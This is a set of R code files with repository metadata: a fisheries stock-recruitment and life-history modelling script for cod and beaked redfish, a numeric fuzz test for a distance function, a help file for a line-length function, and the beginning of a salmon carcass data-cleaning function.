Rec <- Rec/1000000000 # for plotting
SSB <- SSB/1000000 #for plotting
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1), na.action = na.omit)
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
#Recruitment5 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd<-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0, 6e6, 1e3)
SSB1<- SSB1/1000000 # for plotting
Recruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- Stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB1,type="l",col="red", xlim=c(0,6), ylim=c(0,3), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(Recruitment5~SSB,col="red", type="l", xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
#run first lines of NEA rec to load data
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
#SSB1 <- SSB1/1000000 #for plotting
codRec6 <- betabh + alphabh * (1/SSB) # testing the alpha and beta, works!
plot(1/codRec6 ~ SSB,type="l",col="red")
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
## plot
rec.vector<-c(Rec,Recruitment5,Recruitment5.1, Recruitment5.2)
type<-rep(c("Real","Ricker","Ricker5.1", "Ricker5.2"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,4),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT
# ## 6. BH - NB: fit depends heavily on starting values and sucks (tends to become constant)
# compile('Scripts/bh.cpp')
# dyn.load(dynlib('Scripts/bh'))
#
# data<-list()
# data$ssb<-SSB
# data$logR<-log(Rec)
#
# param <- list()
# param$loga <- 1
# param$logb <- 1
# param$logsigma <-0
#
# obj <- MakeADFun(data, param,DLL="bh")
# optbh <- nlminb(obj$par, obj$fn, obj$gr)
#
# Recruitment6 <- (optbh$par[1]*SSB)/(1+optbh$par[2]*SSB) #exp(optbh$par[1]+log(SSB)-log(exp(optbh$par[2])*SSB))
#
# alphabh <- optbh$par[1]
# betabh <- optbh$par[2]
#
#
# plot(Recruitment6~SSB, col="red", pch=3)
#
# ## plot
# rec.vector<-c(Rec, Recruitment5, Recruitment6)
# type<-rep(c("Real","Ricker","BH"),each=length(Rec))
# rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
#
# rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
# scale_color_brewer(palette="Accent") + theme_bw()
##### BEVERTON-HOLT continued (another way)
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
nlsrssb <- nls(1/Rec ~ beta + alpha / SSB, data=data,start=list(alpha=5,beta=-1))
alphabh <- summary(nlsrssb)$coefficients[1]
betabh <- summary(nlsrssb)$coefficients[2]
#Recruitment6 <- exp(alpha)*data$SSB*exp(beta*data$SSB)
RSSB6 <- SSB/(alphabh +betabh *SSB)
bh.sd <- 1/sd(residuals(nlsrssb))
bh.mean <- mean(residuals(nlsrssb))
autocorrelation <- acf(residuals(nlsrssb))
AR1par <- autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0, 4e6, 1e5)
Recruitment6 <- SSB1/(alphabh +betabh *SSB1) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB1/(alphabh +betabh *SSB1) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB1/(alphabh +betabh *SSB1) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB1,col="red", type="l",ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB1,col="blue",pch=1)
points(Recruitment6.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
##---- Compare with assessed SSB --- SSB real data
Recruitment6 <- SSB/(alphabh +betabh *SSB) #Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,bh.sd) #Norm. dist. errorterm (on log-scale)
Recruitment6.1 <- SSB/(alphabh +betabh *SSB) + Rvariation #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment6.2 <- SSB/(alphabh +betabh *SSB) + Rvariationacf #- stochasticity
plot(Recruitment6~SSB,col="red", pch=3,ylim=c(0,max(Rec)*1.2))
points(Recruitment6.1~SSB,col="blue",pch=1)
points(Recruitment6.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
## plot
rec.vector<-c(Rec, Recruitment5, Recruitment6)
type<-rep(c("Real","Ricker","BH"),each=length(Rec))
rec.df<-data.frame(Type=type,SSB=rep(SSB,3),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec,color=Type)) + geom_point(size=3) +
scale_color_brewer(palette="Accent") + theme_bw()
##### Maturity #####
maturity2 <-melt(codmaturity,id.vars="Year")
maturity2$Age <- rep(3:15,each=dim(codmaturity)[1])
maturity2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/maturity.cpp')
dyn.load(dynlib('Scripts/maturity'))
data<-list()
data$age<-maturity2$Age
data$mprop<-maturity2$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((age-a50)/env))),2) ## used in simulation
maturity2$mprop.est <- 1/(1+exp(-((maturity2$Age-a50)/env)))
codmat<-maturity2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) + labs(y= "Maturity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Weights #####
weights2 <-melt(codweight,id.vars="Year")
weights2$Age <- rep(3:15,each=dim(codweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts/weight.cpp')
dyn.load(dynlib('Scripts/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
codwei<-weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) + labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30))+ labs(tag="b")
##### Selectivity #####
fmort2<-melt(codfmort,id.vars="Year")
fmort2$Age <- rep(3:15,each=dim(codfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
codfsel<- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6)+ labs(y= "Fishing selectivity", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=20), axis.title.y = element_text(size=20))+ labs(tag="b")
#######################################################################
######--------------- BEAKED REDFISH --------------- #############
#######################################################################
recage <- 2
amax <- 40
age <- recage:amax
start.rec <- mean(redfishass2$Rec.age2thousand)*1000
#### Recruitment ####
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
## 5. Ricker
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
#nlsricker<- nls(Rec~alpha*SSB*exp(beta*SSB),data=data,start=list(alpha=1e7,beta=1e-7))
nlsrssb <- nls(log(Rec/SSB) ~ alpha+(beta*SSB),data=data,start=list(alpha=5,beta=-1))
alphar <- summary(nlsrssb)$coefficients[1]
betar <- summary(nlsrssb)$coefficients[2]
Recruitment6 <- exp(alphar)*data$SSB*exp(betar*data$SSB)
RSSB5 <- alphar +betar *data$SSB
ricker.sd <-sd(residuals(nlsrssb))
ricker.mean<-mean(residuals(nlsrssb))
autocorrelation<-acf(residuals(nlsrssb))
AR1par <-autocorrelation$acf[2]
# Theoretical SSB1
SSB1<-seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment5 <- exp(alphar)*SSB1*exp(betar *SSB1) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB1),0,ricker.sd) #- Norm dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB1*exp(betar *SSB1) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB1)-1)]+Rvariation[2:length(SSB1)]) #- autocorrelation
Recruitment5.2 <- exp(alphar)*SSB1 *exp(betar *SSB1) *exp(Rvariationacf) #- stochasticity
plot(redRecruitment5_2018~SSB1,type="l",col="blue") #xlim=c(0, 3000000), ylim=c(0, 10e+08), xlab="SSB1 million t", ylab="Rec billions")
points(Recruitment5.1~SSB1,col="blue",pch=1)
points(Recruitment5.2~SSB1,col="purple",pch=2)
points(Rec~SSB,pch=16)
points(y=Rec, x=SSB)
points(y=1/redRec6_2018, x=SSB1, col="blue")
points(y=1/redRec6_2019, x=SSB1, col="red")
points(y=redRecruitment5_2019, x=SSB1, col="red", pch=3)
##---- Compare with assessed SSB --- SSB real data
Recruitment5 <- exp(alphar)*SSB*exp(betar*SSB) #- Deterministic stock-recruitment version
Rvariation<-rnorm(length(SSB),0,ricker.sd) #- Norm. dist. error term (on log-scale)
Recruitment5.1 <- exp(alphar)*SSB*exp(betar *SSB) * exp(Rvariation) #- stochasticity
Rvariationacf<-c(Rvariation[1],AR1par*Rvariation[1:(length(SSB)-1)]+Rvariation[2:length(SSB)]) #- AR1 autocorr to error term
Recruitment5.2 <- exp(alphar)*SSB *exp(betar *SSB) *exp(Rvariationacf) #- stochasticity
plot(redRecruitment5~SSB1,type="l",col="red") # xlim= c(0, 10e+05), ylim=c(0, 2e+09))
points(Recruitment5~SSB,col="blue",pch=1)
points(Recruitment5.2~SSB,col="purple",pch=2)
points(Rec~SSB,pch=16)
c(sum((Rec-Recruitment5)^2),sum((Rec-Recruitment5.1)^2),sum((Rec-Recruitment5.2)^2))
###### BH (trying again 2/2 2022)
# 1/R = beta + alpha * 1/SSB algebraic transformation of BH
tsl <- length(redfishass2$Year) #old assesment 2018
Rec <- redfishass2$Rec.age2thousand[(recage+1):tsl]*1000 #old assesment 2018
SSB <- redfishass2$StockBiomass.t[1:(tsl-(recage))] #old assesment 2018
#tsl <- length(redfishass$Year) #old assesment 2019
#Rec <- redfishass$Rec.age2.1000[(recage+1):tsl]*1000 #old assesment 2019
#SSB <- redfishass$SSB.tonnes[1:(tsl-(recage))]
Rec <- Rec/1000000000 # for plotting million
SSB <- SSB/1000000 #for plotting thousands
data<-list()
data$SSB<-SSB #c(0,SSB)
data$Rec<-Rec #c(0,rep(mean(Rec),length(Rec)))
## BH algebraic transformation, estimating base of ICES data
bhalge <- nls(1/Rec ~ beta + alpha * (1/SSB), data=data, start = list(alpha=5, beta=-1))
alphabh <- summary(bhalge)$coefficients[1]
betabh <- summary(bhalge)$coefficients[2]
# SSB1 theoretical numbers to test alpha & beta estimates
SSB1 <- seq(0,9e6,1e5)
SSB1 <- SSB1/1000000 #for plotting
redRecruitment6 <- betabh + alphabh * (1/SSB1) # testing the alpha and beta, works!
plot(1/redRecruitment6 ~ SSB1,type="l",col="red")
points(x=SSB, y=Rec)
####### dont use any of this
## BH - alpha and beta estimated in TMB - 2 options ##
#Recruitment6 <- exp(alphabh +log(SSB)-log(exp(betabh)*SSB))
#Recruitment6 <- (alphabh*SSB)/(1+betabh*SSB) ### dont use this
#plot(Recruitment6 ~ SSB,type="l",col="red")
#---- Plotting all ----#
rec.vector <- c(redRecruitment5, 1/redRecruitment6)
type <-rep(c("Ricker5", "BH"),each=length(redRecruitment5))
rec.df <- data.frame(Type=type, SSB=rep(SSB1,2),Rec=rec.vector)
rec.df %>% ggplot(aes(x=SSB,y=Rec, color=Type)) + geom_line(size=1.5) +
scale_color_brewer(palette="Accent") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=15),
axis.text.x = element_text(size=15), axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20))
##### Maturity #####
maturity <-melt(redfishmaturity,id.vars="Year")
maturity$Age <- rep(6:19,each=dim(redfishmaturity)[1])
maturity %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/maturity.cpp')
dyn.load(dynlib('Scripts_R/maturity'))
data<-list()
data$age<-maturity$Age
data$mprop<-maturity$value
param <- list()
param$a50 <- 4
param$env <- .2
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="maturity")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
a50 <- opt$par[1]
env <- opt$par[2]
maturity <- round(1/(1+exp(-((unique(age)-a50)/env))),2) ## used in simulation
maturity$mprop.est <- 1/(1+exp(-((maturity$Age-a50)/env)))
redmat<- maturity %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=mprop.est), size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
maturityforplot <- list()
maturityforplot$Age <- c(6:40)
maturityforplot$mprop.est <- 1/(1+exp(-((c(6:40)-a50)/env)))
maturityforplot <- as.data.frame(maturityforplot)
redmat <- ggplot(data=maturityforplot, inherit.aes=F, aes(x=Age,y=mprop.est)) +
geom_line(color="red",size= 0.6) +
labs(y= "Maturity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_text(size=30),
axis.title.y = element_text(size=30)) + labs(tag="c")
redmat + geom_point(data= maturity,aes(x=Age,y=value), size= 2.5)
##### Weights #####
weights2 <-melt(redfishweight,id.vars="Year")
weights2$Age <- rep(6:19,each=dim(redfishweight)[1])
weights2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_line()
compile('Scripts_R/weight.cpp')
dyn.load(dynlib('Scripts_R/weight'))
data<-list()
data$age<-weights2$Age
data$wprop<-weights2$value
param <- list()
param$k <- 0.4
param$b <- 3
param$Winf <- 0.4
param$logsigma <- 0
obj <- MakeADFun(data, param,DLL="weight")
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
k <- opt$par[1]
b <- opt$par[2]
Winf <- opt$par[3]
weights <- Winf * (1-exp(-k * age))^b ### used in simulation
weights2$wprop.est <- Winf * (1-exp(-k * weights2$Age))^b
redwei<- weights2 %>%
ggplot(aes(x=Age,y=value)) + geom_point(size= 3) +
geom_line(inherit.aes=F,aes(x=Age,y=wprop.est), size= 0.6) +
labs(y= "Weight (kg)", x= "Age") + theme_bw() + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20), axis.text.x = element_text(size=20), axis.title.x = element_text(size=30), axis.title.y = element_text(size=30)) + labs(tag="c")
weightforplot <- list()
weightforplot$Age <- c(6:40)
weightforplot$wprop.est <- Winf * (1-exp(-k * (c(6:40))))^b
weightforplot <- as.data.frame(weightforplot)
redwei <- ggplot(data=weightforplot, inherit.aes=F, aes(x=Age,y=wprop.est)) +
geom_line(color="red",size= 0.6) +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redwei + geom_point(data= weights2, aes(x=Age,y=value), size= 2.5)
##### Selectivity #####
fmort2<-melt(redfishfmort,id.vars="Year")
fmort2$Age <- rep(2:19,each=dim(redfishfmort)[1])
fmort2 %>%
ggplot(aes(x=Age,y=value,color=as.factor(Year))) + geom_point()
### using aggregated data
fmort3 <- fmort2 %>% group_by(Age) %>% summarise(fmean=mean(value))
fmort3 <- fmort3 %>% mutate(sel=fmean/max(fmean))
compile('Scripts/sel.cpp')
dyn.load(dynlib('Scripts/sel'))
data<-list()
data$age<-fmort3$Age
data$sel<-fmort3$sel
param <- list()
param$s50 <- 7
param$ss <- 1
param$logsigma <-0
obj <- MakeADFun(data, param,DLL="sel") # MakeADFun - automatic differentiation function
opt <- nlminb(obj$par, obj$fn, obj$gr)
## parameter estimates
s50 <- opt$par[1]
ss <- opt$par[2]
Fsel <- 1/(1+exp(-((age-s50)/ss))) ### used in simulation
fmort3$sel.est <- 1/(1+exp(-((fmort3$Age-s50)/ss)))
redfsel <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point(size= 2.5) +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est), size= 0.6) +
labs(y= "Fishing selectivity", x= "Age") +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(),
panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"),
axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20),
axis.title.x = element_text(size=20),
axis.title.y = element_text(size=20)) + labs(tag="c")
fselforplot <- list()
fselforplot$Age <- c(2:40)
fselforplot$fselprop.est <- 1/(1+exp(-(((c(2:40))-s50)/ss)))
fselforplot <- as.data.frame(fselforplot)
redfsel <- ggplot(data=fselforplot, inherit.aes=F, aes(x=Age,y=fselprop.est)) +
geom_line(color="red",size= 0.6) +
theme_bw() + theme(panel.background = element_blank(),
panel.grid.major = element_blank(), panel.grid.minor = element_blank(),
axis.line = element_line(colour = "black"), axis.text.y = element_text(size=20),
axis.text.x = element_text(size=20), axis.title.x = element_blank(),
axis.title.y = element_blank())
redfsel + geom_point(data= fmort3, aes(x=Age,y=sel), size= 2.5)
grid.arrange(nsshmat, codmat, redmat, ncol=3)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(nsshfsel, codfsel, redfsel)
ggsave(filename="fsel_nssh.pdf",
plot=last_plot(),
width = 100,
height = 80,
units = "mm")
###### PLOTTINg all ############
maturitynssh$species <- "NSSH"
maturitycod$species <- "cod"
maturityred$species <- "redfish"
maturitynssh <- as.data.frame(maturitynssh)
maturitycod <- as.data.frame(maturitycod)
maturityred <- as.data.frame(maturityred)
cbind(maturitycod, maturitynssh, maturityred, capematurity)
map2(maturitynssh, maturitycod, maturityred, capmat, left_join)
matall <- merge(maturitynssh, maturitycod, maturityred, by.x = "mprop.est", by.y = "Age", by.z = "species", all.x = T, all.y = T, all.z= T)
params <- fmort3 %>%
ggplot(aes(x=Age,y=sel)) + geom_point() +
geom_line(inherit.aes=F,aes(x=Age,y=sel.est))+ labs(y= "Fishing selectivity", x= "age") + theme(panel.background = element_blank(), panel.grid.major = element_blank(), panel.grid.minor = element_blank(), axis.line = element_line(colour = "black"))
params <- params + geom_point(aes(y= ))
grid.arrange(redmat, nsshmat, codmat)
grid.arrange(redwei, nsshwei, codwei)
grid.arrange(redfsel, nsshfsel, codfsel)
|
testlist <- list(x = structure(c(2.31584307392677e+77, 9.53818252170339e+295, 1.22812917813345e+146, 4.12396251261199e-221, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), .Dim = c(5L, 7L)))
result <- do.call(multivariance::fastdist,testlist)
str(result) | /multivariance/inst/testfiles/fastdist/AFL_fastdist/fastdist_valgrind_files/1613098437-test.R | no_license | akhikolla/updatedatatype-list3 | R | false | false | 303 | r | testlist <- list(x = structure(c(2.31584307392677e+77, 9.53818252170339e+295, 1.22812917813345e+146, 4.12396251261199e-221, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), .Dim = c(5L, 7L)))
result <- do.call(multivariance::fastdist,testlist)
str(result) |
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/linefuns.R
\name{line_length}
\alias{line_length}
\title{Calculate length of lines in geographic CRS}
\usage{
line_length(l, byid = TRUE)
}
\arguments{
\item{l}{A SpatialLinesDataFrame}
\item{byid}{Logical determining whether the length is returned per object (default is true)}
}
\description{
Calculate length of lines in geographic CRS
}
| /man/line_length.Rd | permissive | stevenysw/stplanr | R | false | true | 421 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/linefuns.R
\name{line_length}
\alias{line_length}
\title{Calculate length of lines in geographic CRS}
\usage{
line_length(l, byid = TRUE)
}
\arguments{
\item{l}{A SpatialLinesDataFrame}
\item{byid}{Logical determining whether the length is returned per object (default is true)}
}
\description{
Calculate length of lines in geographic CRS
}
|
#' @title Clean North East Oregon Carcass Data - from ODFW Access DB
#' @description Processes the raw ODFW Access DB carcass dataset and standardizes to join with clean_carcassData(CDMS_dat)
#' @param data Data obtained from premade query in ODFW Access DB. !!Export data as text file, comma separated, headers included.!!
#' @param data Import text file with: read.delim(file = 'path_to_file.txt', sep = ',', header = TRUE)
#' @export
#' @import dplyr lubridate
#' @author Tyler T. Stright
#' @examples
#' clean_carcass_Data(car_dat)
#'
clean_carcassData_NEOR <- function(data){
{if(is.null(data))stop("carcass data must be supplied")}
# NOTE: Fields not captured from carcass query: "Subbasin" "MEPSlength" "CWTAge" "BestAge" "PITage" "LengthAge" "AgeKey"
# "PIT2" "BestScaleAge" "Adult_or_Jack" "MarkRecapSizeCategory" "TagFile" "ExternalMarks" "Population"
# filter for GRSME only?
#WHERE(b.Subbasin IN ('Imnaha', 'Wallowa-Lostine', 'Wilderness-Wenaha', 'Wilderness-Minam'))
data_clean <- data %>%
mutate(
ESU_DPS = 'Snake River Spring/Summer-run Chinook Salmon ESU',
MPG = 'Grande Ronde / Imnaha',
POP_NAME = case_when(
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River mainstem',
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River == 'Wenaha River' ~ 'Wenaha River'
),
TRT_POPID = case_when(
River %in% c('Bear Creek', 'Hurricane Creek', 'Lostine River', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'GRLOS',
River == 'Minam River' ~ 'GRMIN',
River == 'Wenaha River' ~ 'GRWEN',
River %in% c('Big Sheep Creek', 'Lick Creek', 'Little Sheep Creek') ~ 'IRBSH',
River == 'Imnaha River' ~ 'IRMAI'
),
Species = 'Chinook salmon',
Run = 'Spring/summer',
ReportingGroup = case_when( # in between tributary and population: transect/tributary/reporting group/population/mpg/esu
River %in% c('Big Sheep Creek', 'Lick Creek','Little Sheep Creek') ~ 'Big Sheep Creek',
River == 'Imnaha River' ~ 'Imnaha River',
River == 'Lostine River' ~ 'Lostine River',
River == 'Minam River' ~ 'Minam River',
River %in% c('Bear Creek', 'Hurricane Creek', 'Parsnip Creek', 'Prairie Creek', 'Spring Creek', 'Wallowa River') ~ 'Wallowa River',
River == 'Wenaha River' ~ 'Wenaha River'
),
StreamName = River,
TribToName = case_when(
River %in% c('Little Sheep Creek', 'Lick Creek') ~ 'Big Sheep Creek',
River %in% c('Wallowa River','Wenaha River') ~ 'Grande Ronde River',
River == 'Big Sheep Creek' ~ 'Imnaha River',
River == 'Imnaha River' ~ 'Snake River',
River %in% c('Bear Creek', 'Lostine River', 'Hurricane Creek', 'Minam River', 'Prairie Creek', 'Parsnip Creek', 'Spring Creek') ~ 'Wallowa River'
),
LocationLabel = Section,
TransectName = SiteID,
SurveyDate = lubridate::ymd(gsub('T00:00:00', '', SurveyDate)),
SurveyYear = lubridate::year(SurveyDate),
ActivityDate = paste0(SurveyDate, 'T00:00:00'),
ActivityId = as.integer(SurveyID),
DatasetId = NA_integer_,
LocationId = NA_integer_,
TargetSpecies = 'S_CHN',
Pass = NA_integer_,
StartSurvey = NA_character_,
EndSurvey = NA_character_,
StartTime = Start_Time,
EndTime = End_Time,
Observers = Surveyors,
SurveyMethod = 'Ground',
GPSUnit = NA_character_, # No GPS for Carcasses.
Datum = NA_character_,
Weather = NA_character_,
Visibility = Visibility,
